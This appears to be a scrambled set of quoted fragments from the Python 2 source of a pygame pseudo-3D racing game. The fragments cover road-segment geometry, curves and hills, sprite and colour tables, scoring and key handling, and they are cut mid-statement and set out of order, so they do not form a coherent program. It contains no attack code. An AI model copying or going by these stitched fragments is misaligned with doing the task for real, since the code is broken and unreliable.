__init__(self, size, *args, **kwargs):", "= self.get_seg_base_i() print 'segbi', segbi # TODO: do at update", "= 116 pnts = [[x1, d-y1], [x2, d-y2], [x3, d-y3],", "rd_start_seg_init(self, n=3): seg_n = len(self.segments) if seg_n == 0: return", "= FP_COLORS['FINISH'] b_curve = self.player_seg.get('curve', 0.0) #b_percent = 0.5 b_percent", "3) class FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size)", "# <3> xx1 = rad1 * math.cos(engi * i) xx2", "#self.rd_seg_init_rand(10)#50#10#3#1 #segnrand = random.randint(3, 30) segnrand = random.randint(2, 6) #", "2 if trees.rect.left - trees.rect.width > 0: trees.rect.left -= trees.rect.width", "rd_seg_add(self, curve=0.0, yw=0.0): #print '+', curve, yw n = len(self.segments)", "100), c_prog=consts.GREEN) self.spd.rect.top = 70#340 self.spd.rect.left = 602 #self.spd.rotate(180) self.disp_add(self.spd)", "rd_seg_render__2_o(self): \"\"\"curve test 1\"\"\" #theta_i = math.pi /180.0 * 0.1", "cv_to_engl(self, curve, rad): a = float(curve) / rad #a *=", "-1]) enter = random.randint(10, 40) hold = random.randint(10, 40) leave", "return result def util_ease_in(self, a, b, percent): return a +", "while (result < 0): result += mx return result def", "-580 elif x_i == 4: sprt_at = 1100 elif x_i", "segs = self.segments[:-self.seg_draw_n] return segs # #### geometry #### #", "use the segment just under the car #sprts = self.player_seg['sprites']", "xcr4 = xcr4 - x_curve - dx_curve x_curve = x_curve", "score self.last_seg_i = 0 self.game_over = True self.game_score = 1.0", "cache self.rd_sprt_cache = [] # <1> #for i, seg in", "#y_sprt = (ys1 + ys3) / 2.0 x_dt = x_rnd", "2:v self.speed_dt_up = 1.0#2.0#3.0 self.speed_dt_dn = 2.0#4.0#6.0 self.speed_dt_na = 1.0#3.0", "= - (b_curve * b_percent) x_curve = 0 #print 'b_curve',", "40) if p < 0.3: curve = 0.0 yw =", "'y': 897, 'w': 298, 'h': 190 }, 'BILLBOARD07': { 'x':", "0.0 self.d = 200.0#100.0#10.0#30.0#1.0 self.w = self.size[0] self.h = self.size[1]", "'score': -5,}, 'pot2': {'imgs': ['img_sprts/i_pot2.png'], 'score': -1,}, 'shell': {'imgs': ['img_sprts/p_shell.png'],", "}, 'HILL': {'NONE': 0, 'LOW': 20, 'MEDIUM': 40, 'HIGH': 60", "self.tm_end - self.tm_start else: self.tm_start = 0.0 #self.tm_end = 0.0", "#return events r_events = [] for event in events: #print", "4: theta1 = theta_i * i theta2 = theta_i *", "class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size, cfg, *args, **kwargs): super(FPSptRoadB, self).__init__(size)", "!= 1: self.player_go = 0 if 1 in e_keys_up: if", "i #xc2 = -self.road_w / 2 - self.player_x - curve_d", "print 'segbi', segbi self.player_seg = self.segments[segbi] b_curve = self.player_seg.get('curve', 0.0)", "theta2 = theta_i * (i + 1) dx1 = self.seg_len", "for test if i < 10: print '>>> ', i", "sky in self.bg_sky: #print sky sky.rect.left += int(self.sky_speed * p_dt)", "'x': 5, 'y': 897, 'w': 298, 'h': 190 }, 'BILLBOARD07':", "def add_road(self, enter, hold, leave, curve, yw=0.0): #print enter, hold,", "do at update #dpx1 = self.seg_len * math.tan(theta_i) #self.player_x -=", "'LENGTH': {'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100 },", "'shell': {'imgs': ['img_sprts/p_shell.png'], 'score': -20,}, 'rockd': {'imgs': ['img_sprts/rock_d2.png'], 'score': -10,},", "}, 'PLAYER_UPHILL_RIGHT': { 'x': 1385, 'y': 1018, 'w': 80, 'h':", "'=' * 80 #print 'self.position', self.position for i, seg in", "== 0: return #self.segments[0]['color'] = FP_COLORS['START_Y'] #self.segments[2]['color'] = FP_COLORS['START_Y'] for", "'w': 1280, 'h': 480 }, } IMG_POS_SPRITES = { 'PALM_TREE':", "elif p < 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY'])", "/ 2 - self.player_x xc3 = self.road_w / 2 -", "* 2 sprt_at = 10000 if x_i == 0: sprt_at", "zw2 - self.camera_z - self.position # for curve xc1 =", "= 0.5#1.0#0.1# else: if cv_s: cv_l += curve else: cv_s", "-= hill.rect.width * 2 for trees in self.bg_trees: trees.rect.left +=", "300#200 #self.seg_draw_n = 200#150 self.seg_draw_n = 70#100#200#150 self.speed = 0.0", "'r') as fi: s = fi.read() segs = utils.json_loads(s) return", "'y': 1018, 'w': 80, 'h': 56 }, 'PLAYER_UPHILL_LEFT': { 'x':", "#''' ''' #x# if seg['index'] < segbi: zw1 = (i+1)*self.seg_len", "self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16) self.scr.rect.top = 40#454 self.scr.rect.left", "yp1 = self.yc_to_yp(yc1, self.d, zc1) ys1 = self.yp_to_ys(yp1, self.h) ys2", "'h': 220 }, 'COLUMN': { 'x': 995, 'y': 5, 'w':", "40) hold = random.randint(10, 40) leave = random.randint(10, 40) curve", "* math.pi)/2) + 0.5) def util_curve_percent_remaining(self, n, total): return (n", "self.player_x - curve_d * i #xc3 = self.road_w / 2", "= info['name'] obj_k = str(seg['index']) + '_' + str(i) +", "def rd_seg_render(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i", "prog): y = self.size[1] * prog self.fill(self.c_bg) #self.pygm.draw.rect(self.surf, consts.GREEN, #", "is not None: try: segs = self.rd_seg_json_load(segs_file) self.segments = segs", "obj.scale(scale) except: #print 'scale <2>', scale pass x_i_saved = info.get('x_i')", "sprt = random.choice(FP_ROAD_SPRTS.keys()) s = { 'name': sprt, 'type': 1,", "= self.xp_to_xs(xpr1, self.w) xpr2 = self.xc_to_xp(xcr2, self.d, zc1) xsr2 =", "self.player_x -= 9 if self.player_x < -1000: self.player_di = 1", "cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress,", "{'NONE': 0, 'SHORT': 25, 'MEDIUM': 50, 'LONG': 100 }, #", "elif x_i == 1: sprt_at = -40 elif x_i ==", "self.disp_add(self.fog) def get_seg_base_i(self, pos=None): if pos is None: pos =", "i #xc3 = self.road_w / 2 - self.player_x - curve_d", "# info['x_i'] = x_i # x_i_saved = x_i obj.rect.top =", "return pnts def draw_segs(self, segs, rad): pnts = self.get_segs_pnts(segs, rad)", "1, # image / animate / ... 'obj': None, #", "= (rad - xx2) - self.player_x xc3 = (rad -", "== 4: sprt_at = 1100 elif x_i == 5: sprt_at", "= 3 #print 'p_curve', p_curve p_dt = self.speed * p_curve", "= seg.get('sprites') if not sprts: return None for i, info", "car_w / 2): if (car_x - w_half) < sprt_at <", "0 self.rdmap.rect.left = 80 self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN,", "# <2> si = (segbi + i) % seg_n #print", "= 10.0#50.0# x += rad_m * math.cos(tht) y += rad_m", "# #### geometry #### # def geo_prjc_scale(self, d, zc): if", "FPSptRoadMap(sptdraw.SptDrawBase): def __init__(self, size, segs, rad, *args, **kwargs): super(FPSptRoadMap, self).__init__(size)", "def get_seg_base_i(self, pos=None): if pos is None: pos = self.position", "a circle\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i =", "sprts = seg.get('sprites') if not sprts: return None for i,", "* self.centrifugal #print p_dt #self.player_x -= p_dt self.player_x += p_dt", "+ self.lane_w xcr1 = self.lane_w - self.player_x xcr2 = -self.lane_w", "not in ['obj']: spr_n[sk] = sv else: spr_n[sk] = None", "y1-d]] #pnts = [[x1, y1+a], [x2, y2+a], [x3, y3+a], [x4,", "- (self.position % self.seg_len) zc2 = zw2 - self.camera_z -", "yw1, yw2 xp1 = self.xc_to_xp(xc1, self.d, zc1) xs1 = self.xp_to_xs(xp1,", "'lane': '#CCCCCC'}, 'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' },", "< sprt_x < (car_x + car_w / 2): if (car_x", "self.segments[si] #''' ''' # for test if i < 10:", "from starfish import consts from starfish import sptdraw from starfish", "*= 10.0 #print a s = 1.0 if a <", "hold, leave, 0.0, 0.0) def rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand', n", "#self.track_len = (len(self.segments) - self.seg_draw_n) * self.seg_len def seg_lasy_y(self): seg_n", "y, scale): sprts = seg.get('sprites') if not sprts: return None", "self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top = 0 self.bg_trees1.rect.left = 0", "return segs_c def rd_seg_json_save(self, f): sc = self.rd_seg_get_cleared(self.segments) s =", "{ 'SKY': '#72D7EE', 'TREE': '#005108', 'FOG': '#005108', 'LIGHT': {'road': '#6B6B6B',", "= -1.0 if a < -1.0: a = -1.0 elif", "- self.camera_z - self.position ''' # for curve xc1 =", "self.position zc2 = zw2 - self.camera_z - self.position curve_d =", "pnts] c = utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c, cpnts) self.pygm.draw.lines(self.surf, c, False,", "self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event) return r_events def refresh(self, fps_clock, *args,", "= self.xc_to_xp(xcr3, self.d, zc2) xsr3 = self.xp_to_xs(xpr3, self.w) xpr4 =", "self.rad = rad #self.fill(consts.WHITE) self.draw_segs(self.segs, self.rad) def xy_to_cntr(self, x, y):", "0: # self.score = 0 self.game_over = True self.game_score =", "= 2 ** 64 xp = xc else: xp =", "xs3, ys3, seg['color']['road']) def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0", "sc = self.rd_seg_get_cleared(self.segments) s = utils.json_dumps(sc) with open(f, 'w') as", "= self.tm_start else: self.tm_end = time.time() self.tm_last_once = self.tm_end -", "<= 1: return #if len(pnts) > 0: # pnts.append(pnts[0]) cpnts", "100) leave = random.randint(10, 100) self.add_road(enter, hold, leave, 0.0, 0.0)", "self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' #if 1: #if i", "#print p_dt for sky in self.bg_sky: #print sky sky.rect.left +=", "out here self.rd_sprt_objs[obj_k] = obj # for reset to delete", "a segment seg_i = self.player_seg['index'] if seg_i > self.last_seg_i: self.last_seg_i", "= xc3 - x_curve - dx_curve xc4 = xc4 -", "FP_COLOR_WHITE}, 'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK}, 'START_Y': {'road':", "#a = 60 #pnts = [[x1, y1], [x2, y2], [x3,", "x_i_saved = info.get('x_i') #if not x_i_saved: # info['x_i'] = x_i", "995, 'y': 5, 'w': 200, 'h': 315 }, 'BILLBOARD01': {", "#zc2 = self.position - (zw2 - self.camera_z) xp1 = self.xc_to_xp(xc1,", "= self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' #if 1: #if", "-230 #self.disp_add(self.bk) self.scn1 = FPSceneA() self.disp_add(self.scn1) road_file = kwargs.get('road_file') if", "/ zc) return yp def xp_to_xs(self, xp, w): #xs =", "2 for hill in self.bg_hills: hill.rect.left += int(self.hill_speed * p_dt)", "60#10#20 rad = self.road_w * 4#2 rad1 = rad +", "self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter), self.util_ease_out(start_y, end_y, float(n)/total)) for n in range(hold):", "rad1 = rad + self.road_w / 2 rad2 = rad", "in e_keys_dn: self.player_go = 2 if 1 in e_keys_dn: self.player_di", "self.bg_sky2.rect.left = self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top =", "40)) #return o class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size, cfg, *args,", "= len(self.segments) i = (i + seg_n) % seg_n return", "* p_curve * self.centrifugal #print p_dt #self.player_x -= p_dt self.player_x", "0.0 self.seg_len = 200.0#100.0#20.0#60.0#200.0# self.road_w = 2400#2000#600.0#200.0#1000.0#200# self.camera_h = 500.0#1000.0#", "__init__(self, img_file, pos, *args, **kwargs): super(FPSptSprts, self).__init__(img_file, pos) class FPSptFog(sptdraw.SptDrawBase):", "go out the road if self.player_x < -self.road_w / 2", "segs=None): if not segs: segs = self.segments segs_c = []", "* (n - i) ca = 200 / n *", "self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY']) else: enter = random.randint(10,", "the car self.player_di = 0 # 0:^ 1:> 2:v 3:<", "for segment draw #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10) # for a3c train", "'COLUMN': { 'x': 995, 'y': 5, 'w': 200, 'h': 315", "+ 1)) xx4 = rad2 * math.cos(engi * (i +", "'rumble': '#555555', 'lane': '#CCCCCC'}, } FP_ROAD = { 'LENGTH': {'NONE':", "<1> #for i, seg in enumerate(self.segments): # <2> for i", "seg_i > self.last_seg_i: self.last_seg_i = seg_i else: return # NOTE:", "in seg['sprites']: spr_n = {} for sk, sv in spr.items():", "}, 'CAR01': { 'x': 1205, 'y': 1018, 'w': 80, 'h':", "xs4 += dx2 #+ dx1 #''' self.render_polygon(None, 0, ys1, self.w,", "1:^ 2:v self.speed_dt_up = 1.0#2.0#3.0 self.speed_dt_dn = 2.0#4.0#6.0 self.speed_dt_na =", "self.speed * p_curve * self.centrifugal #print p_dt #self.player_x -= p_dt", "def draw_on(self, *args, **kwargs): #self.fill(self.c) d = 2 n =", "#self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30, 100)) self.rd_seg_init(random.randint(1, 10)) # for a3c train self.rd_seg_init_rand_curve()", "yw1 = seg['p1']['world'].get('y', 0.0) yw2 = seg['p2']['world'].get('y', 0.0) yc1 =", "#print si seg = self.segments[si] #x#zw1 = (i+1)*self.seg_len #zw2 =", "/ total def add_road(self, enter, hold, leave, curve, yw=0.0): #print", "utils.clr_from_str(color) try: self.pygm.draw.polygon(self.surf, c, pnts) except Exception as e: #print", "= float('inf') #yp = 2 ** 64 yp = yc", "if i < 10: print xs1, ys1, xs2, ys2 print", "if curve == 0.0: rad_m = 1.0#0.1# else: a =", "self.score += scr def check_tm(self): if self.position > self.seg_len *", "+ self.lane_w xcl3 = xc3 - self.lane_w xcl4 = xc4", "p[1]) for p in pnts] c = utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c,", "self.lane_w xcl4 = xc4 + self.lane_w xcr1 = self.lane_w -", "r_events.append(event) self.e_keys_up = e_keys_up self.e_keys_dn = e_keys_dn return r_events def", "/ ', seg_n self.player_seg = self.segments[segbi] self.base_seg = self.segments[(segbi +", "rl * random.random() * 8.0 yw = 0.0 self.add_road(enter, hold,", "segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file) self.rdmap_reset() def road_segs_to_file(self,", "[x3, y3], [x4, y4], [x1, y1]] #pnts = [[x1, y1-d],", "zw1 - self.camera_z - (self.position % self.seg_len) zc2 = zw2", "self.add_fog() def prms_reset(self, keep_segs=False): self.e_keys_up = [] self.e_keys_dn = []", "80, 'h': 45 }, 'PLAYER_LEFT': { 'x': 995, 'y': 480,", "num, 0, -height) self.add_road(num, num, num, 0, height) self.add_road(num, num,", "NOTE: objs will be deleted at rd_sprts_del_all_objs() ##del self.rd_sprt_objs[obj_k] img", "event in events: #print event if event.type == self.pglc.KEYUP: di", "self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0] / 2, self.size[1] / 2), self.size[0] /", "si seg = self.segments[si] #''' ''' # for test if", "<:::>', 640, 480, road_file='sr_road.txt') sf.mainloop() if __name__ == '__main__': main()", "starfish import sptdraw from starfish import utils IMG_POS_BACKGROUND = {", "'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK}, 'START_Y': {'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble':", "here we should use the segment just under the car", "+ sky.rect.width < 0: sky.rect.left += sky.rect.width * 2 if", "/ 2 - self.player_x # <3> #engi = math.pi /", "pygm from starfish import consts from starfish import sptdraw from", "kwargs.get('car') self.bg_sky = kwargs.get('bg_sky') self.bg_hills = kwargs.get('bg_hills') self.bg_trees = kwargs.get('bg_trees')", "0.0: self.speed = 0.0 elif self.speed > self.speed_max: self.speed =", "#+ dx1 xs4 += dx2 #+ dx1 ''' self.render_polygon(None, 0,", "p_dt) # always move the cloud #sky.rect.left -= self.sky_speed if", "FP_ROAD['LENGTH']['MEDIUM'], 0.0) def add_low_rolling_hills(self, num, height): num = num or", "ys4, seg['color']['rumble']) xpr1 = self.xc_to_xp(xcr1, self.d, zc1) xsr1 = self.xp_to_xs(xpr1,", "keep_segs: self.segments = [] self.rd_sprt_objs = {} self.rd_sprt_cache = []", "== 0: sprt_at = 40 elif x_i == 1: sprt_at", "2 ** 64 yp = yc else: yp = yc", "'name': sprt, 'type': 1, # image / animate / ...", "x1, y1, x2, y2, x3, y3, x4, y4, color): #d", "/ 2 - self.player_x - curve_d * i # <3>", "ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' #if 1:", "ys3, seg['color']['road']) def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 *", "= 0.0 else: rad_m = 0.5#1.0#0.1# else: if cv_s: cv_l", "995, 'y': 330, 'w': 195, 'h': 140 }, 'SEMI': {", "p_curve p_dt = self.speed * p_curve * self.centrifugal #p_dt =", "first sprite ! sprt = sprts[0] x_i = sprt.get('x_i') if", "= seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 = zw1 - self.camera_z", "[] for seg in segs: if not seg['sprites']: segs_c.append(seg) else:", "def cv_to_engl(self, curve, rad): a = float(curve) / rad #a", "200.0#100.0#10.0#30.0#1.0 self.w = self.size[0] self.h = self.size[1] if not keep_segs:", "s = -1.0 if a < -1.0: a = -1.0", "= self.bg_sky1.rect.width self.disp_add(self.bg_sky2) self.bg_hills1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0", "http://pixel.garoux.net/screen/game_list Usage: * UP/DOWN/LEFT/RIGHT * SPACE : hide/show road map", "+ 20 else: pass p_curve = self.player_seg.get('curve', 0.0) #print 'p_curve',", "events, *args, **kwargs): return events def refresh(self, fps_clock, *args, **kwargs):", "10 if self.speed < 0.0: self.speed = 0.0 elif self.speed", "self.player_x xc3 = (rad - xx3) - self.player_x xc4 =", "/ 60#10#20 rad = self.road_w * 4#2 rad1 = rad", "self.add_road(enter, hold, leave, 0.0, 0.0) def rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand',", "1000: self.player_di = 3 #''' #''' self.position += 10.0#5.0#1.0 self.position", "segments 'CURVE': {'NONE': 0, 'EASY': 2, 'MEDIUM': 4, 'HARD': 6", "curve, yw n = len(self.segments) #print n if n %", "4.0) #self.rd_seg_init_rand(10)#50#10#3#1 #segnrand = random.randint(3, 30) segnrand = random.randint(2, 6)", "IMG_POS_SPRITES['PLAYER_STRAIGHT']) #print self.road.cameraDepth/self.road.playerZ #self.car.scale(self.road.cameraDepth/self.road.playerZ) self.car.scale(2) self.car.rect.top = 400 self.car.rect.left =", "dx1 = self.seg_len * math.tan(theta1) dx2 = self.seg_len * math.tan(theta2)", "ys2 = ys1 yp3 = self.yc_to_yp(yc, self.d, zc2) ys3 =", "self.e_keys_dn = [] self.camera_x = 0.0 self.camera_y = 0.0 self.camera_z", "elif self.player_di == 3: #self.player_x -= self.player_x_dt self.player_x -= self.speed", "/ 2, self.size[1] / 2), self.size[0] / 2, 0) class", "if 0 in e_keys_dn: self.player_go = 1 elif 2 in", "ys4, xsr3, ys3, seg['color']['rumble']) def rd_seg_render__2_o(self): \"\"\"curve test 1\"\"\" #theta_i", "hills yw1 = seg['p1']['world'].get('y', 0.0) yw2 = seg['p2']['world'].get('y', 0.0) yc1", "'#555555', 'lane': '#CCCCCC'}, } FP_ROAD = { 'LENGTH': {'NONE': 0,", "self.road_segs_to_file() else: r_events.append(event) elif event.type == self.pglc.KEYDOWN: r_events.append(event) else: r_events.append(event)", "segs = self.rd_seg_json_load(segs_file) self.segments = segs self.track_len = len(self.segments) *", "}, 'BILLBOARD05': { 'x': 5, 'y': 897, 'w': 298, 'h':", "#sky.rect.left -= self.sky_speed if sky.rect.left + sky.rect.width < 0: sky.rect.left", "100)) self.rd_seg_init(random.randint(1, 10)) # for a3c train self.rd_seg_init_rand_curve() #self.add_curves() #self.add_low_rolling_hills(20,", "80 self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd = pygm.SptLbl(str(int(self.road.speed)), c=consts.GREEN, font_size=12) self.rdpsd.rect.top =", "2: if i < self.seg_draw_n / 4: theta1 = theta_i", "> self.last_seg_i: self.last_seg_i = seg_i else: return # NOTE: here", "-self.lane_w - self.player_x yc = self.camera_h #print '=' * 80", "hill.rect.left += int(self.hill_speed * p_dt) if hill.rect.left + hill.rect.width <", "kwargs.get('road_file') if road_file: self.scn1.straight.road_reset_from_file(segs_file=road_file) def main(): #sf = GMFlatpath('flatpath <:::>',", "the car #sprts = self.player_seg['sprites'] sprts = self.base_seg['sprites'] if not", "self.speed = 0.0 self.position = 0.0 self.player_x = 0.0#100.0#1000.0# self.centrifugal", "1]['p2']['world'].get('y', 0.0) def rd_seg_init_rand(self, n=50): #print 'rd_seg_init_rand', n for i", "seg['color']['rumble']) xpr1 = self.xc_to_xp(xcr1, self.d, zc1) xsr1 = self.xp_to_xs(xpr1, self.w)", "__init__(self, size, segs, rad, *args, **kwargs): super(FPSptRoadMap, self).__init__(size) self.segs =", "= self.xc_to_xp(xcr4, self.d, zc2) xsr4 = self.xp_to_xs(xpr4, self.w) self.render_polygon(None, xsr1,", "/ 2.0 / 60#10#20 rad = self.road_w * 4#2 rad1", "self.bk.rect.left = -230 #self.disp_add(self.bk) self.scn1 = FPSceneA() self.disp_add(self.scn1) road_file =", "{'road': FP_COLOR_YELLOW, 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, } FP_ROAD", "hill.rect.left -= hill.rect.width * 2 for trees in self.bg_trees: trees.rect.left", "1: self.player_go = 0 if 1 in e_keys_up: if self.player_di", "'p_curve', p_curve p_dt = self.speed * p_curve * self.centrifugal #p_dt", "self.road_w / 2 - self.player_x - curve_d * i #xc4", "self.speed <= 0.0: return p_curve = self.player_seg.get('curve', 0.0) #p_curve =", "xpr4 = self.xc_to_xp(xcr4, self.d, zc2) xsr4 = self.xp_to_xs(xpr4, self.w) self.render_polygon(None,", "= self.segments[segbi] self.base_seg = self.segments[(segbi + 2) % seg_n] #", "['img_sprts/clown1.png'], 'score': -100,}, } class SptTmpx(sptdraw.SptDrawBase): def __init__(self, size, *args,", "self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16) self.scr.rect.top", "# make sure we check score once for a segment", "xs def yp_to_ys(self, yp, h): #ys = h / 2.0", "0 self.game_over = True self.game_score = 1.0 if self.player_di ==", "class FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size, c_bg=consts.BLUE, c_prog=consts.GREEN): super(FPSptProgress, self).__init__(size) self.c_bg", "whole=False): if whole: segs = self.segments else: segs = self.segments[:-self.seg_draw_n]", "{ 'x': 1205, 'y': 760, 'w': 168, 'h': 248 },", "avoid: pygame.error: Width or height is too large if scale", "= 0.0 rad_m = 4.0#2.0#1.0# cv_s = 0 cv_l =", "#print p rl = random.choice([1, -1]) enter = random.randint(10, 40)", "def get_segs_pnts(self, segs, rad): pnts = [] x, y =", "self.w, ys2, self.w, ys4, 0, ys3, seg['color']['grass']) # road self.render_polygon(None,", "obj = FPSptRdSprts.create_by_img(FP_ROAD_SPRTS[sprt][0]) info['obj'] = obj self.disp_add(obj) ''' # <2>", "def key_to_di(self, k): if k == self.pglc.K_UP: return 0 elif", "xs3 += dx2 #+ dx1 xs4 += dx2 #+ dx1", "... 'obj': None, # need to create at render ##'x_i':", "= {'road': FP_COLOR_WHITE} else: c = FP_COLORS['DARK'] #c = {'road':", "the first sprite ! sprt = sprts[0] x_i = sprt.get('x_i')", "elif x_i == 3: sprt_at = -580 elif x_i ==", "for curve xc1 = xc1 - x_curve xc2 = xc2", "< 0: trees.rect.left += trees.rect.width * 2 if trees.rect.left -", "+ 20 elif self.player_di == 3: #self.player_x -= self.player_x_dt self.player_x", "zw2 - self.camera_z - (self.position % self.seg_len) ''' #x# zw1", "{ 'index': n, 'p1': {'world': {'z': (n + 1) *", "# for a3c train self.rd_start_seg_init() self.rd_sprts_init_rand() def draw_on(self, *args, **kwargs):", "hold, leave, curve, yw) def rd_start_seg_init(self, n=3): seg_n = len(self.segments)", "**kwargs): super(FPSptBg, self).__init__(img_file, pos) class FPSptSprts(pygm.SptImgOne): def __init__(self, img_file, pos,", "''' zw1 = seg['p1']['world']['z'] zw2 = seg['p2']['world']['z'] zc1 = zw1", "/ 2 + x, self.size[1] / 2 - y] def", "'h': 155 }, 'CACTUS': { 'x': 929, 'y': 897, 'w':", "!= 1: self.player_di = 0 def update_world(self): if self.player_go ==", "[0, i * d, self.size[0], d] #ca = 255 /", "+ i) % seg_n #print si seg = self.segments[si] #x#zw1", "if 0 in e_keys_up: if self.player_go != 2: self.player_go =", "2 - self.player_x #xcl1 = xc1 - self.lane_w #xcl2 =", "leave, curve, yw=0.0): #print enter, hold, leave, curve, yw start_y", "**kwargs): self.fill(consts.GREEN) self.pygm.draw.circle(self.surf, consts.WHITE, (self.size[0] / 2, self.size[1] / 2),", "self.position # <2> seg_n = len(self.segments) segbi = self.get_seg_base_i() print", "'rockr': {'imgs': ['img_sprts/rock_r2.png'], 'score': -50,}, #'ashra_defeat': {'imgs': ['img_sprts/ashra_defeat1.png'], 'score': -100,},", "/ 2 - self.player_x - curve_d * i #xc4 =", "* RETURN : go to a new road TODO: *", "0: sky.rect.left -= sky.rect.width * 2 for hill in self.bg_hills:", "events if not self.flag_check_event: return events else: return self.check_key(events) def", "else: enter = random.randint(10, 100) hold = random.randint(10, 100) leave", "-height) self.add_road(num, num, num, 0, height) self.add_road(num, num, num, 0,", "self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc, self.d, zc2) ys3", "2 - self.player_x - curve_d * i #xc3 = self.road_w", "i * d, self.size[0], d] #ca = 255 / n", "'y': 490, 'w': 122, 'h': 144 }, 'TRUCK': { 'x':", "/ n * (n - i) self.c[3] = ca self.pygm.draw.rect(self.surf,", "self.camera_h self.xw = 0.0 self.yw = 0.0 self.zw = 0.0", "y4], [x1, y1]] #pnts = [[x1, y1-d], [x2, y2-d], [x3,", "'w': 80, 'h': 59 }, 'CAR04': { 'x': 1383, 'y':", "-= sky.rect.width * 2 if self.speed <= 0.0: return p_curve", "'y': 531, 'w': 80, 'h': 41 } } FP_COLOR_WHITE =", "# <2> for i in range(self.seg_draw_n): #''' # <2> si", "check if this seg is looped seg_scale = self.geo_prjc_scale(self.d, zc1)", "math.tan(theta_i) #self.player_x -= dpx1 # <1> #for i, seg in", "(n - i) self.c[3] = ca self.pygm.draw.rect(self.surf, self.c, rct) class", "self.pglc.K_v or k == self.pglc.K_n: return 2 elif k ==", "x_sprt = (xsr1 + xsl1) / 2.0 #x_sprt = random.choice(x_pos)", "render_polygon(self, ctx, x1, y1, x2, y2, x3, y3, x4, y4,", "self.pglc.K_RIGHT: return 1 elif k == self.pglc.K_DOWN: return 2 elif", "ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' # for", "1: #self.player_x += self.player_x_dt self.player_x += self.speed / 5 +", "p_dt self.player_x += p_dt def check_if_car_out_road(self): # decrease score when", "else: curve = rl * random.random() * 6.0 yw =", "IMG_POS_BACKGROUND['HILLS']) self.bg_hills1.rect.top = 0 self.bg_hills1.rect.left = 0 self.disp_add(self.bg_hills1) self.bg_hills2 =", "k == self.pglc.K_SLASH: self.road_segs_to_file() else: r_events.append(event) elif event.type == self.pglc.KEYDOWN:", "self.player_x xc2 = (rad - xx2) - self.player_x xc3 =", "self.speed > self.speed_max: self.speed = self.speed_max self.position += self.speed if", "# for test if i < 10: print '>>> ',", "= (xsr1 + xsl1) / 2.0 #x_sprt = random.choice(x_pos) x_i", "xx1) - self.player_x xc2 = (rad - xx2) - self.player_x", "self.speed_dt_up elif self.player_go == 2: self.speed -= self.speed_dt_dn else: self.speed", "self.player_di = 1 elif 3 in e_keys_dn: self.player_di = 3", "theta1 = theta_i * i theta2 = theta_i * (i", "'w': 80, 'h': 56 }, 'PLAYER_UPHILL_LEFT': { 'x': 1383, 'y':", "== 3: # < self.player_x -= 9 if self.player_x <", "100 }, # num segments 'CURVE': {'NONE': 0, 'EASY': 2,", "0.9 #theta_i = 0.0 xc1 = self.road_w / 2 -", "= 0.3#0.15# def rd_reset(self, init=False, keep_segs=False, segs_file=None): #if not init", "b, percent): return a + (b - a) * (1", "xx1 = rad1 * math.cos(engi * i) xx2 = rad2", "xs4 = self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc1, self.d, zc1) ys1", "30 ''' # grass self.render_polygon(None, 0, ys1, self.w, ys2, self.w,", "x_i_saved: # info['x_i'] = x_i # x_i_saved = x_i obj.rect.top", "if 1:#i % 2 == 1: xpl1 = 